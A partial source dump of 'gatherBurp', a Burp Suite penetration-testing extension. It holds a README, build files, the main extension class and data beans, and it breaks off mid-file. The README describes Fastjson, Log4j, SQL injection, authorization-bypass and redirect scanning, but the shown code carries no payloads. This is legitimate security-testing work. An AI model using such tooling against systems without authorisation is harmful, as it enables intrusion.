Showing preview only (601K chars total). Download the full file or copy to clipboard to get everything.
Repository: kN6jq/gatherBurp
Branch: master
Commit: ec6d8aa0582e
Files: 78
Total size: 543.5 KB
Directory structure:
gitextract_wqm_s8bq/
├── .gitignore
├── .idea/
│ ├── .gitignore
│ ├── MarsCodeWorkspaceAppSettings.xml
│ ├── encodings.xml
│ ├── misc.xml
│ ├── runConfigurations.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── README.md
├── pom.xml
└── src/
└── main/
├── java/
│ └── burp/
│ ├── BurpExtender.java
│ ├── bean/
│ │ ├── AuthBean.java
│ │ ├── ConfigBean.java
│ │ ├── FastjsonBean.java
│ │ ├── Log4jBean.java
│ │ ├── NucleiBean.java
│ │ ├── PermBean.java
│ │ ├── RouteBean.java
│ │ ├── SimilarDomainConfigBean.java
│ │ ├── SimilarDomainResultBean.java
│ │ ├── SimilarProjectBean.java
│ │ ├── SimilarUrlResultBean.java
│ │ └── SqlBean.java
│ ├── dao/
│ │ ├── ConfigDao.java
│ │ ├── FastjsonDao.java
│ │ ├── Log4jDao.java
│ │ ├── PermDao.java
│ │ ├── RouteDao.java
│ │ ├── SimilarDomainConfigDao.java
│ │ ├── SimilarDomainResultDao.java
│ │ ├── SimilarProjectDao.java
│ │ ├── SimilarUrlResultDao.java
│ │ └── SqlDao.java
│ ├── menu/
│ │ ├── AuthMenu.java
│ │ ├── FastjsonMenu.java
│ │ ├── Log4jMenu.java
│ │ ├── NucleiMenu.java
│ │ ├── PermMenu.java
│ │ ├── RouteMenu.java
│ │ ├── SqlMenu.java
│ │ └── TextProcessMenu.java
│ ├── ui/
│ │ ├── AuthUI.java
│ │ ├── ConfigUI.java
│ │ ├── FastjsonUI.java
│ │ ├── Log4jUI.java
│ │ ├── MainUI.java
│ │ ├── PermUI.java
│ │ ├── RouteUI.java
│ │ ├── SimilarHelper/
│ │ │ ├── CacheManager.java
│ │ │ ├── TableRenderer.java
│ │ │ ├── ThreadManager.java
│ │ │ ├── bean/
│ │ │ │ ├── Domain.java
│ │ │ │ ├── Project.java
│ │ │ │ └── URL.java
│ │ │ ├── dialog/
│ │ │ │ ├── DomainConfigDialog.java
│ │ │ │ └── ProjectManageDialog.java
│ │ │ ├── table/
│ │ │ │ ├── DomainTable.java
│ │ │ │ └── URLTable.java
│ │ │ └── tablemodel/
│ │ │ └── TableModel.java
│ │ ├── SimilarUI.java
│ │ ├── SocksUI.java
│ │ ├── SqlUI.java
│ │ ├── UIHandler.java
│ │ ├── UIHepler/
│ │ │ └── GridBagConstraintsHelper.java
│ │ └── UrlRedirectUI.java
│ └── utils/
│ ├── CustomScanIssue.java
│ ├── DbUtils.java
│ ├── ExpressionUtils.java
│ ├── I18nUtils.java
│ ├── JsonProcessorUtil.java
│ ├── JsonUtils.java
│ ├── Nuclei.java
│ ├── ResponseSimilarityMatcher.java
│ ├── RobotInput.java
│ ├── SmartRequestDetector.java
│ ├── UrlCacheUtil.java
│ └── Utils.java
└── resources/
└── logback.xml
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
target/
!.mvn/wrapper/maven-wrapper.jar
!**/src/main/**/target/
!**/src/test/**/target/
### IntelliJ IDEA ###
.idea/modules.xml
.idea/jarRepositories.xml
.idea/compiler.xml
.idea/libraries/
*.iws
*.iml
*.ipr
### Eclipse ###
.apt_generated
.classpath
.factorypath
.project
.settings
.springBeans
.sts4-cache
### NetBeans ###
/nbproject/private/
/nbbuild/
/dist/
/nbdist/
/.nb-gradle/
build/
!**/src/main/**/build/
!**/src/test/**/build/
### VS Code ###
.vscode/
### Mac OS ###
.DS_Store
================================================
FILE: .idea/.gitignore
================================================
# Default ignored files
/shelf/
/workspace.xml
# Editor-based HTTP Client requests
/httpRequests/
# Datasource local storage ignored files
/dataSources/
/dataSources.local.xml
# GitHub Copilot persisted chat sessions
/copilot/chatSessions
================================================
FILE: .idea/MarsCodeWorkspaceAppSettings.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="com.codeverse.userSettings.MarscodeWorkspaceAppSettingsState">
<option name="ckgOperationStatus" value="SUCCESS" />
<option name="progress" value="0.7794118" />
</component>
</project>
================================================
FILE: .idea/encodings.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Encoding">
<file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
<file url="file://$PROJECT_DIR$/src/main/resources" charset="UTF-8" />
</component>
</project>
================================================
FILE: .idea/misc.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ASMSmaliIdeaPluginConfiguration">
<asm skipDebug="true" skipFrames="true" skipCode="false" expandFrames="false" />
<groovy codeStyle="LEGACY" />
</component>
<component name="ExternalStorageConfigurationManager" enabled="true" />
<component name="MavenProjectsManager">
<option name="originalFiles">
<list>
<option value="$PROJECT_DIR$/pom.xml" />
</list>
</option>
</component>
<component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8" project-jdk-type="JavaSDK">
<output url="file://$PROJECT_DIR$/out" />
</component>
</project>
================================================
FILE: .idea/runConfigurations.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="RunConfigurationProducerService">
<option name="ignoredProducers">
<set>
<option value="com.android.tools.idea.compose.preview.runconfiguration.ComposePreviewRunConfigurationProducer" />
</set>
</option>
</component>
</project>
================================================
FILE: .idea/uiDesigner.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Palette2">
<group name="Swing">
<item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
</item>
<item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
</item>
<item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.svg" removable="false" auto-create-binding="false" can-attach-label="true">
<default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
</item>
<item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
<initial-values>
<property name="text" value="Button" />
</initial-values>
</item>
<item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="RadioButton" />
</initial-values>
</item>
<item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="CheckBox" />
</initial-values>
</item>
<item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
<initial-values>
<property name="text" value="Label" />
</initial-values>
</item>
<item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
</item>
<item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.svg" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
</item>
<item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
<preferred-size width="-1" height="20" />
</default-constraints>
</item>
<item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
</item>
<item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
</item>
</group>
</component>
<component name="uidesigner-configuration">
<option name="INSTRUMENT_CLASSES" value="false" />
<option name="COPY_FORMS_RUNTIME_TO_OUTPUT" value="false" />
</component>
</project>
================================================
FILE: .idea/vcs.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="" vcs="Git" />
</component>
</project>
================================================
FILE: README.md
================================================
# GatherBurp
<div align="center">
[](LICENSE)
[](https://github.com/kN6jq/gatherBurp/stargazers)
[](https://github.com/kN6jq/gatherBurp/issues)
[](https://github.com/kN6jq/gatherBurp/releases)
**一款强大的 BurpSuite 安全测试扩展,集成多种漏洞检测与渗透测试功能**
[功能特点](#-功能特点) •
[快速开始](#-快速开始) •
[详细文档](#-详细文档) •
[贡献指南](#-贡献指南) •
[交流讨论](#-交流讨论)
</div>
## 📋 功能特点
GatherBurp 集成了多种安全测试功能,可大幅提升渗透测试和漏洞挖掘效率。
### 🔍 漏洞检测
- **Fastjson 漏洞扫描**
- 支持 DNS 回连检测
- 支持 JNDI 利用链检测
- 支持回显检测(Tomcat、Spring 等环境)
- 支持版本识别
- **SQL 注入检测**
- 支持 GET、POST 参数检测
- 支持 Cookie 参数检测
- 支持多层级 JSON 参数检测
- 支持报错注入、时间盲注、布尔盲注
- 支持自定义 payload 和检测规则
- **Log4j 漏洞检测**
- 支持 DNS 和 IP 回连检测
- 支持参数和 Header 检测
- 自定义 payload 列表
- **URL 重定向漏洞检测**
- 自动检测常见重定向参数
- 支持自定义 payload 和参数列表
- 结果可按 ID 数值排序
### 🛡️ 权限测试
- **越权访问检测**
- 支持原始请求、低权限请求和无权限请求对比
- 自动分析响应长度差异
- 结果可按 ID 数值排序
- **认证绕过测试**
- URI 特殊字符绕过
- Header 字段绕过
- Accept 头绕过
### 🌐 信息收集
- **多层级路由扫描**
- 支持复杂条件表达式过滤
- 自定义字典和规则
- 智能识别有效路径
### 🔧 辅助工具
- **Nuclei 模板生成**
- 一键生成 Nuclei 扫描模板
- 支持多种漏洞类型
- **代理池功能**
- 支持 SOCKS 代理
- 多代理自动切换
- **复杂数据提交**
- 支持 Base64 编码数据自动解码
- 解决序列化数据编码问题
- **工具快速调用**
- 支持自定义工具集成
- 支持占位符:{url}、{host}、{request}
## 🚀 快速开始
### 安装要求
- JDK 1.8+
- BurpSuite Professional 2021.x+
- Maven 3.6+ (仅编译时需要)
### 编译安装
```bash
# 克隆仓库
git clone https://github.com/kN6jq/gatherBurp.git
# 进入项目目录
cd gatherBurp
# 编译打包
mvn clean package
```
编译后的 JAR 文件位于 `target/` 目录下。
### 在 BurpSuite 中加载
1. 打开 BurpSuite Professional
2. 进入 `Extender` -> `Extensions` 标签
3. 点击 `Add` 按钮
4. 选择 `Java` 类型,并选择编译好的 JAR 文件
5. 点击 `Next` 完成加载
### 基本使用
所有功能可通过以下方式访问:
1. **右键菜单**:在 Proxy、Repeater 等模块中右键点击请求
2. **扩展标签页**:在 BurpSuite 顶部标签栏中的 `GatherBurp` 标签
## 📚 详细文档
### Fastjson 扫描
**使用步骤:**
1. 在 `配置` 标签页设置 DNS 和 IP
2. 右键选择 `FastJson` -> 选择检测类型:
- DNS 检测:适用于外网环境
- JNDI 检测:支持 DNS/IP 回连
- 回显检测:适用于内网环境
- 版本检测:识别 Fastjson 版本
**高级配置:**
- DNS 扫描:配置类型为 dns,使用 FUZZ 占位符
- 回显检测支持多种环境:Tomcat、Spring 等
### SQL 注入检测
**功能特点:**
- 支持多种注入类型检测
- 支持参数、Cookie、Header、JSON 数据
- 支持自定义 payload 和错误关键字
- 支持白名单域名过滤
- 结果可按 ID 数值排序
**使用方法:**
1. 右键选择 `SQL Inject`
2. 在标签页中配置检测参数
3. 查看检测结果和详细请求响应
### Log4j 漏洞检测
**功能特点:**
- 支持 DNS 和 IP 回连检测
- 支持参数和 Header 检测
- 自定义 payload 列表
- 结果可按 ID 数值排序
**使用方法:**
1. 右键选择 `Log4j Scan`
2. 在标签页中配置检测参数
3. 查看检测结果和详细请求响应
### 权限检测
**功能特点:**
- 支持原始请求、低权限请求和无权限请求对比
- 自动分析响应长度差异
- 结果可按 ID 数值排序
**使用方法:**
1. 右键选择 `Perm Check`
2. 在标签页中配置低权限和无权限认证信息
3. 查看检测结果和详细请求响应对比
### URL 重定向检测
**功能特点:**
- 自动检测常见重定向参数
- 支持自定义 payload 和参数列表
- 结果可按 ID 数值排序
**使用方法:**
1. 右键选择 `UrlRedirect`
2. 在标签页中配置检测参数
3. 查看检测结果和详细请求响应
### 多层级路由扫描
**表达式语法:**
```
code=200
body="hello"
title="druid"
headers="Content-Type: application/json"
# 复杂条件
code=200 && body="hello"
code!=200 && (body="hello" || title="druid")
```
**使用方法:**
1. 在 `Route` 标签页配置扫描参数
2. 设置字典和过滤条件
3. 开始扫描并查看结果
### 工具快速调用
**配置方法:**
1. 在 `配置` 标签页添加工具名称和命令
2. 支持以下占位符:
- `{url}`: 当前请求的完整 URL
- `{host}`: 当前请求的主机名
- `{request}`: 当前请求的临时文件路径
**使用方法:**
右键菜单中选择配置好的工具名称即可快速调用
## 🤝 贡献指南
我们非常欢迎各种形式的贡献:
- 🐛 **报告 Bug**:提交详细的 Bug 报告,包括复现步骤
- 💡 **功能建议**:提出新功能或改进建议
- 📝 **文档改进**:完善或更正文档内容
- 🔧 **代码贡献**:提交 Pull Request 修复问题或添加功能
**贡献流程:**
1. Fork 本仓库
2. 创建功能分支 (`git checkout -b feature/amazing-feature`)
3. 提交更改 (`git commit -m 'Add some amazing feature'`)
4. 推送到分支 (`git push origin feature/amazing-feature`)
5. 提交 Pull Request
## 👥 交流讨论
加入微信讨论群:
请移步 Issues 查看群聊二维码
## 📋 未来计划
- [ ] 更多漏洞检测模块
- [ ] 性能优化和代码重构
- [ ] 完善文档和使用示例
- [ ] 支持更多自定义配置选项
- [ ] 国际化支持
## ⚠️ 免责声明
本工具仅用于授权的安全测试和教育目的,请勿用于非法用途。使用本工具造成的任何后果由使用者自行承担。
## 📄 许可证
[MIT License](LICENSE)
---
<div align="center">
如果觉得这个项目对您有帮助,请给个 Star ⭐️ 支持一下!
</div>
================================================
FILE: pom.xml
================================================
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.xm17</groupId>
<artifactId>gatherBurp</artifactId>
<version>1.2.0-SNAPSHOT</version>
<packaging>jar</packaging>
<name>gatherBurp</name>
<url>http://maven.apache.org</url>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<repositories>
<repository>
<id>jitpack.io</id>
<url>https://jitpack.io</url>
</repository>
</repositories>
<dependencies>
<dependency>
<groupId>com.github.bit4woo</groupId>
<artifactId>burp-api-common</artifactId>
<version>master-SNAPSHOT</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.intellij/forms_rt -->
<dependency>
<groupId>com.intellij</groupId>
<artifactId>forms_rt</artifactId>
<version>7.0.3</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc -->
<dependency>
<groupId>org.xerial</groupId>
<artifactId>sqlite-jdbc</artifactId>
<version>3.43.2.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.83</version>
</dependency>
<dependency>
<groupId>net.portswigger.burp.extender</groupId>
<artifactId>burp-extender-api</artifactId>
<version>2.3</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-expression</artifactId>
<version>4.3.22.RELEASE</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<artifactId>maven-assembly-plugin</artifactId>
<configuration>
<archive>
<manifest>
<mainClass>burp.BurpExtender</mainClass>
</manifest>
<manifestEntries>
<Class-Path>.</Class-Path>
</manifestEntries>
</archive>
<descriptorRefs>
<descriptorRef>jar-with-dependencies</descriptorRef>
</descriptorRefs>
</configuration>
<executions>
<execution>
<id>make-assembly</id>
<phase>package</phase>
<goals>
<goal>single</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>8</source>
<target>8</target>
</configuration>
</plugin>
</plugins>
</build>
</project>
================================================
FILE: src/main/java/burp/BurpExtender.java
================================================
package burp;
import burp.bean.ConfigBean;
import burp.menu.*;
import burp.ui.MainUI;
import burp.utils.RobotInput;
import burp.utils.Utils;
import javax.swing.*;
import java.awt.event.ActionEvent;
import java.io.PrintWriter;
import java.util.*;
import static burp.dao.ConfigDao.getToolConfig;
import static burp.utils.Utils.writeReqFile;
public class BurpExtender implements IBurpExtender, IContextMenuFactory, IHttpListener {
@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks iBurpExtenderCallbacks) {
Utils.callbacks = iBurpExtenderCallbacks;
Utils.helpers = iBurpExtenderCallbacks.getHelpers();
Utils.stdout = new PrintWriter(iBurpExtenderCallbacks.getStdout(), true);
Utils.stderr = new PrintWriter(iBurpExtenderCallbacks.getStderr(), true);
Utils.callbacks.setExtensionName(Utils.NAME);
Utils.callbacks.registerContextMenuFactory(this);
Utils.callbacks.registerHttpListener(this);
MainUI mainUI = new MainUI(Utils.callbacks);
Utils.callbacks.addSuiteTab(mainUI);
SwingUtilities.invokeLater(new Runnable() {
@Override
public void run() {
Utils.callbacks.customizeUiComponent(mainUI);
}
});
Utils.stdout.println("[" + Utils.NAME + " v" + Utils.VERSION + "] by " + Utils.AUTHOR + " loaded successfully.\n");
Utils.stdout.println("Tip: If any errors occur, delete the '.gather' directory in your user folder and reload the extension.\n");
Utils.stdout.println("GitHub: https://github.com/kN6jq/gatherBurp\n");
}
@Override
public List<JMenuItem> createMenuItems(IContextMenuInvocation iContextMenuInvocation) {
List<JMenuItem> listMenuItems = new ArrayList<JMenuItem>(1);
IHttpRequestResponse[] requestResponses = iContextMenuInvocation.getSelectedMessages();
IHttpRequestResponse baseRequestResponse = iContextMenuInvocation.getSelectedMessages()[0];
// 如果是个空的, 则返回null
if (baseRequestResponse.getHttpService() == null) {
return null;
}
List<ConfigBean> toolParam = getToolConfig();
for (ConfigBean config : toolParam) {
String name = config.getType();
String value = config.getValue();
if (!name.isEmpty() && !value.isEmpty()) {
JMenuItem jMenuItem = new JMenuItem(name);
jMenuItem.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (value.contains("{url}")){
String url = Utils.helpers.analyzeRequest(baseRequestResponse).getUrl().toString();
try {
RobotInput ri = new RobotInput();
ri.inputString(value.replace("{url}", url));
} catch (Exception ex) {
Utils.stderr.println(ex.getMessage());
}
}else if (value.contains("{host}")) {
String host = baseRequestResponse.getHttpService().getHost();
try {
RobotInput ri = new RobotInput();
ri.inputString(value.replace("{host}", host));
} catch (Exception ex) {
Utils.stderr.println(ex.getMessage());
}
} else if (value.contains("{request}")) {
String requestFilePath = writeReqFile(baseRequestResponse);
if (requestFilePath != null) {
try {
RobotInput ri = new RobotInput();
ri.inputString(value.replace("{request}", requestFilePath));
} catch (Exception ex) {
Utils.stderr.println(ex.getMessage());
}
} else {
Utils.stderr.println("Failed to write request file.");
}
}
}
});
listMenuItems.add(jMenuItem);
}
}
JMenu fastjson = new JMenu("FastJson");
fastjson.add(new FastjsonMenu().FastjsonDnslogMenu(requestResponses));
fastjson.add(new FastjsonMenu().FastjsonEchoMenu(requestResponses));
fastjson.add(new FastjsonMenu().FastjsonJNDIMenu(requestResponses));
fastjson.add(new FastjsonMenu().FastjsonVersionMenu(requestResponses));
listMenuItems.add(fastjson);
listMenuItems.add(new SqlMenu(requestResponses));
listMenuItems.add(new AuthMenu(requestResponses));
listMenuItems.add(new RouteMenu(requestResponses));
listMenuItems.add(new Log4jMenu(requestResponses));
listMenuItems.add(new PermMenu(requestResponses));
listMenuItems.add(new NucleiMenu(requestResponses));
listMenuItems.add(new TextProcessMenu(iContextMenuInvocation));
return listMenuItems;
}
@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {
if (toolFlag == IBurpExtenderCallbacks.TOOL_REPEATER && messageIsRequest) {
byte[] request = messageInfo.getRequest();
String requestStr = Utils.helpers.bytesToString(request);
if (requestStr.contains("<datab64>")) {
// 解码 base64 数据
String data = requestStr.substring(requestStr.indexOf("<datab64>") + 9, requestStr.indexOf("</datab64>"));
byte[] decodedData = Base64.getDecoder().decode(data);
// 构建新的请求体
byte[] newBytes = new byte[requestStr.indexOf("<datab64>") + decodedData.length + (request.length - requestStr.indexOf("</datab64>") - 10)];
System.arraycopy(request, 0, newBytes, 0, requestStr.indexOf("<datab64>"));
System.arraycopy(decodedData, 0, newBytes, requestStr.indexOf("<datab64>"), decodedData.length);
System.arraycopy(request, requestStr.indexOf("</datab64>") + 10, newBytes, requestStr.indexOf("<datab64>") + decodedData.length, request.length - requestStr.indexOf("</datab64>") - 10);
// 更新 Content-Length
IRequestInfo analyzedRequest = Utils.helpers.analyzeRequest(newBytes);
List<String> headers = new ArrayList<>(analyzedRequest.getHeaders());
int bodyOffset = analyzedRequest.getBodyOffset();
int contentLength = newBytes.length - bodyOffset;
// 更新或添加 Content-Length 头
boolean contentLengthFound = false;
for (int i = 0; i < headers.size(); i++) {
if (headers.get(i).startsWith("Content-Length:")) {
headers.set(i, "Content-Length: " + contentLength);
contentLengthFound = true;
break;
}
}
if (!contentLengthFound) {
headers.add("Content-Length: " + contentLength);
}
// 重建请求
byte[] body = new byte[newBytes.length - bodyOffset];
System.arraycopy(newBytes, bodyOffset, body, 0, body.length);
byte[] updatedRequest = Utils.helpers.buildHttpMessage(headers, body);
messageInfo.setRequest(updatedRequest);
}
}
}
}
================================================
FILE: src/main/java/burp/bean/AuthBean.java
================================================
package burp.bean;
public class AuthBean {
private String method;
private String path;
private String headers;
public AuthBean() {
}
public AuthBean(String method, String path, String headers) {
this.method = method;
this.path = path;
this.headers = headers;
}
public String getMethod() {
return method;
}
public void setMethod(String method) {
this.method = method;
}
public String getPath() {
return path;
}
public void setPath(String path) {
this.path = path;
}
public String getHeaders() {
return headers;
}
public void setHeaders(String headers) {
this.headers = headers;
}
}
================================================
FILE: src/main/java/burp/bean/ConfigBean.java
================================================
package burp.bean;
public class ConfigBean {
private Integer id;
private String module;
private String type;
private String value;
public ConfigBean() {
}
public ConfigBean(String module, String type, String value) {
this.module = module;
this.type = type;
this.value = value;
}
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public String getModule() {
return module;
}
public void setModule(String module) {
this.module = module;
}
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public String getValue() {
return value;
}
public void setValue(String value) {
this.value = value;
}
}
================================================
FILE: src/main/java/burp/bean/FastjsonBean.java
================================================
package burp.bean;
public class FastjsonBean {
private Integer id;
private String type;
private String value;
public FastjsonBean() {
}
public FastjsonBean(String type, String value) {
this.type = type;
this.value = value;
}
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public String getValue() {
return value;
}
public void setValue(String value) {
this.value = value;
}
}
================================================
FILE: src/main/java/burp/bean/Log4jBean.java
================================================
package burp.bean;
public class Log4jBean {
private Integer id;
private String type;
private String value;
public Log4jBean() {
}
public Log4jBean(String type, String value) {
this.type = type;
this.value = value;
}
public Log4jBean(Integer id, String type, String value) {
this.id = id;
this.type = type;
this.value = value;
}
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public String getValue() {
return value;
}
public void setValue(String value) {
this.value = value;
}
}
================================================
FILE: src/main/java/burp/bean/NucleiBean.java
================================================
package burp.bean;
public class NucleiBean {
private String id;
private String name;
private String author;
private String severity;
private String description;
private String reference;
private String tags;
private String method;
private String path;
private String header;
private String dsl;
private String raw;
public NucleiBean() {
}
public String getId() {
return id;
}
public void setId(String id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getAuthor() {
return author;
}
public void setAuthor(String author) {
this.author = author;
}
public String getSeverity() {
return severity;
}
public void setSeverity(String severity) {
this.severity = severity;
}
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public String getReference() {
return reference;
}
public void setReference(String reference) {
this.reference = reference;
}
public String getTags() {
return tags;
}
public void setTags(String tags) {
this.tags = tags;
}
public String getMethod() {
return method;
}
public void setMethod(String method) {
this.method = method;
}
public String getPath() {
return path;
}
public void setPath(String path) {
this.path = path;
}
public String getHeader() {
return header;
}
public void setHeader(String header) {
this.header = header;
}
public String getDsl() {
return dsl;
}
public void setDsl(String dsl) {
this.dsl = dsl;
}
public String getRaw() {
return raw;
}
public void setRaw(String raw) {
this.raw = raw;
}
}
================================================
FILE: src/main/java/burp/bean/PermBean.java
================================================
package burp.bean;
/**
* @Author Xm17
* @Date 2024-06-22 10:47
*/
public class PermBean {
private int id;
private String type;
private String value;
public PermBean() {
}
public PermBean(String type, String value) {
this.type = type;
this.value = value;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public String getValue() {
return value;
}
